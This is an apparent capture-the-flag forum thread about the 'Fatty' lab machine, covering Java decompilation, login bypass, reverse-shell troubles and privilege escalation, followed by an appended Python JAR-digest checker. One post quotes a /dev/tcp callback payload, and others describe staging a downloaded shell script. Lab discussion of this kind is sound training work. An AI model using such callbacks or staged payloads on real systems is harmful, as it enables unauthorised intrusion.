Fatty

@tel0s said:

@0x41 said:

@tel0s said:

Stuck on the user part - I’ve managed to get server bins, and I know I need to find a route to get admin to be able to call the “not fully implemented” function (you know what I’m talking about). Continuing to fail in defeating the login due to the username in payload messing up hashing for successful auth. Am I rabbit holed?

I was in the same boat as you before figuring out how to get around that (and later seeing other people’s logins and realising I didn’t even need to get around that lol)

where does the hashing happen?

I got past it, and am at code exec stage, but I cannot for the life of me get it to call back. not sure if it’s my payload “echo 1 > /dev/tcp/blah/port” or the gadget in the tool. I’ve tried a few.

no redirections, one argument only. I recommend doing it in two stages

I have pingback working, but I can’t get a shell. I’ve tried the two stage method, pulling a script into tmp for first stage, then executing it for second, but I can’t find a second stage that works. perl etc.

if you have only one argument you can pass, how can you put it in /tmp? :wink:
don’t worry about where you put it, just download it and try running it from that directory

You can definitely have more than one argument - I’ve just got user. problem is redirection chars etc.

@ue4dai said:

@CyberGeek01 said:

(Quote)
jd-gui seems to work fine.

I really thank you for this suggestion. It works very well

Sure thing! Happy to pass the hint along.

Can somebody PM me about the admin trick? I have a very specific question. I do not know why this technique is not working. :confused:

For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.

Same happening to me. Have tried sending many payload variations from a common tool but have not gotten anything back. Wondering if I need to go deeper and create my own custom one that can be properly cast.

@Iris said:

For gaining user level reverse shell was there much editing of source code to allow the exploitation of the OWASP method? I am struggling to get a callback and am worried I botched the code.

Hello! Is there a need to write a custom shell? Idk, but at the moment I am stuck with the debugging and fixing of fy-ct.jr
Can you give me a suggestion? Thanks!

Hi, I’m struggling with the initial foothold. I’m using recaf but not really seeing where I should work. Could anyone give me a nudge?

Eager to discuss the user payload with someone. Can’t figure out why I get nothing back.

Edit: always (usually?) update your tools. Now onto root.

Got root! It was fascinating. Nice and fun box! Thanks @qtc and thanks for support @alesc.

Never mind, i got it

Is there a need to get the source code of the server? I decompiled the client and only looked at it.

ty :wink:

Managed to get user, but have no clue how to escalate to root. If someone could give me a nudge that goes beyond “connect the dots”, I would be really grateful :wink:

I have finished initial enumeration. I pulled the .jar file into ghidra. Looking at all the posts, I should be using jd-gui instead? Thank you in advance.

@zard said:

@red0nyx said:

Getting this error in the Java client: Caused by: java.lang.SecurityException: SHA-256 digest error for b…xml | I already changed the settings but can’t seem to get it to work. Any help is appreciated!

you need to update the jar file

How do I update the jar file?

used “jar uf jar-file fatty-*****t.jar”

not working … never mind got it.
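
The "SHA-256 digest error" quoted in the posts above is what the JVM raises when an entry in a signed JAR no longer matches the digest recorded for it in META-INF/MANIFEST.MF. As an added example (not from the thread or from the box author), this Python check recomputes those digests and lists the entries that were altered or removed; the file names and contents are constructed samples.

```python
import base64, hashlib, io, zipfile

def sha256_b64(data):
    return base64.b64encode(hashlib.sha256(data).digest()).decode()

def parse_manifest(text):
    """Map entry name -> recorded SHA-256-Digest from MANIFEST.MF text."""
    # Lines longer than 72 bytes are folded; a leading space marks a continuation.
    unfolded = text.replace("\r\n", "\n").replace("\n ", "")
    digests = {}
    for section in unfolded.split("\n\n"):
        attrs = dict(l.split(": ", 1) for l in section.split("\n") if ": " in l)
        if "Name" in attrs and "SHA-256-Digest" in attrs:
            digests[attrs["Name"]] = attrs["SHA-256-Digest"]
    return digests

def mismatched_entries(jar_bytes):
    """Entries that are missing or whose bytes differ from the manifest digest."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        recorded = parse_manifest(jar.read("META-INF/MANIFEST.MF").decode("utf-8"))
        present = set(jar.namelist())
        return sorted(name for name, digest in recorded.items()
                      if name not in present or sha256_b64(jar.read(name)) != digest)

def build_jar(files, recorded=None):
    """Constructed sample JAR; the manifest records digests of `recorded`."""
    lines = ["Manifest-Version: 1.0", ""]
    for name, data in (files if recorded is None else recorded).items():
        lines += [f"Name: {name}", f"SHA-256-Digest: {sha256_b64(data)}", ""]
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "\r\n".join(lines) + "\r\n")
        for name, data in files.items():
            jar.writestr(name, data)
    return buf.getvalue()

# Constructed sample contents, not files from the box discussed in the thread.
ORIGINAL = {"settings.xml": b"<config port='1'/>", "App.class": b"\xca\xfe\xba\xbe"}
EDITED = {**ORIGINAL, "settings.xml": b"<config port='2'/>"}

if __name__ == "__main__":
    print(mismatched_entries(build_jar(ORIGINAL)))          # untouched JAR
    print(mismatched_entries(build_jar(EDITED, ORIGINAL)))  # entry changed after digests were recorded
```

Run against a real archive with `mismatched_entries(open(path, "rb").read())`; it checks only the per-entry manifest digests, not the signature block that covers the manifest itself.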